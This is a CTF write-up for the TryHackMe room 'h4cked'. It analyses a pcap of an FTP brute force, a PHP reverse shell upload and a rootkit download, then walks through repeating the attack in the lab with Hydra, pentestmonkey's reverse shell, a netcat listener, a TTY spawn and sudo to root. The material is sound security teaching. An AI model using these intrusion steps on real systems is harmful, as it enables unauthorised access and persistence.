THM writeup: h4cked

Earlier this week I developed a Try Hack Me room called “h4cked”. The room is a combination between learning network forensics and basic penetration testing skills. You can find it here:

https://tryhackme.com/jr/h4cked

Scenario – Task 1:

“It seems like our machine got hacked by an anonymous threat actor. However, we are lucky to have a .pcap file from the attack. Can you determine what happened? Download the .pcap file and use Wireshark to view it.”

This task can be solved numerous ways, as Wireshark can display certain types of information based on filters, or simply just viewing the protocol and/or info tabs.

# The attacker is trying to log into a specific service. What service is this?

The first network packets shows a series of requests to port 21. By right clicking on the first network packet, it is possible to follow the TCP stream to see exactly what is happening during these requests. The TCP stream confirms that the attacker is trying to log on FTP. The protocol is also listed as “FTP” in Wireshark.

Answer: FTP

# There is a very popular tool by Van Hauser which can be used to brute force a series of services. What is the name of this tool?

https://github.com/vanhauser-thc/thc-hydra

Answer: Hydra

# The attacker is trying to log on with a specific username. What is the username?

While right clicking the first network packets and following the TCP stream (as demonstrated in the first question), the user “jenny” appears during the login requests. However, you can also filter the protocols in Wireshark and look specifically at FTP. The info tab will display “Request: USER jenny” a series of times.

Answer: Jenny

# What is the user’s password?

Packet number 305 shows a FTP “230 Login successful” response. By following the TCP stream, the password is displayed.

# What is the current FTP working directory after the attacker logged in?

Packet number 401 shows the current working directory, as the attacked executed the “PWD” command.

Answer: /var/www/html

# The attacker uploaded a backdoor. What is the backdoor’s filename?

Packet number 425 and onwards shows that the attacker uploaded the shell.php file and executed chmod 777 to change its permissions.

Once again, several of the answers above can be found by following the TCP stream, rather than viewing one-and-one network packet.

Answer: shell.php

# The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?

When uploading files, the protocol is listed as FTP-DATA in Wireshark (packet number 431), rather than “plain” FTP. Once again, following the TCP stream will show the full contents of the shell.php file. The origin is from Pentestmonkey’s website.

Answer: http://pentestmonkey.net/tools/php-reverse-shell

# Which command did the attacker manually execute after getting a reverse shell?

For the rest of the questions throughout this task, following the TCP stream from packet number 452 will reveal the attacker’s interaction with the system.

Answer: whoami

# What is the computer’s hostname?

Packet number 452 TCP stream.

Answer: wir3

# Which command did the attacker execute to spawn a new TTY shell?

Packet number 452 TCP stream.

Answer: python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

# Which command was executed to gain a root shell?

Packet number 452 TCP stream.

Answer: sudo su

# The attacker downloaded something from GitHub. What is the name of the GitHub project?

The Packet number 452 TCP stream shows that the attacker issued the git clone command to download the project “Reptile”.

Answer: Reptile

# The project can be used to install a stealthy backdoor on the system. It can be very hard to detect. What is this type of backdoor called?

The “About” section at the official Reptile GitHub repository lists Reptile as a LKM Linux Rootkit. https://github.com/f0rb1dd3n/Reptile

Answer: Rootkit

Scenario – Task 2:

“The attacker has changed the user’s password! Can you replicate the attacker’s steps and read the flag.txt? The flag is located in the /root/Reptile directory. Remember, you can always look back at the .pcap file if necessary. Good luck!”

Use hydra to attack FTP using the rockyou.txt word list.

Download pentest monkey’s shell (http://pentestmonkey.net/tools/php-reverse-shell). If you are using Kali, the web shell is already located on the machine as /usr/share/webshells/php/php-reverse-shell.php. Change the values as shown in the image above. The IP address is your attack box (tun0 interface). The port can be any port that is not in use on your machine. The reverse shell was saved as reverse.php.

Connect to the FTP service with username jenny and password 987654321. Use put reverse.php to upload your reverse shell and chmod 777 reverse.php to change its permissions. Exit the service.

Create a netcat listener on the designated port. Use curl (or even a web browser) to execute the reverse shell. Spawn a new TTY by running python3 -c ‘import pty; pty.spawn(“/bin/bash”)’. From hereon, the attacker can use su jenny and sudo su to become root, as the password is already known. Read the flag.txt file in the /root/Reptile directory.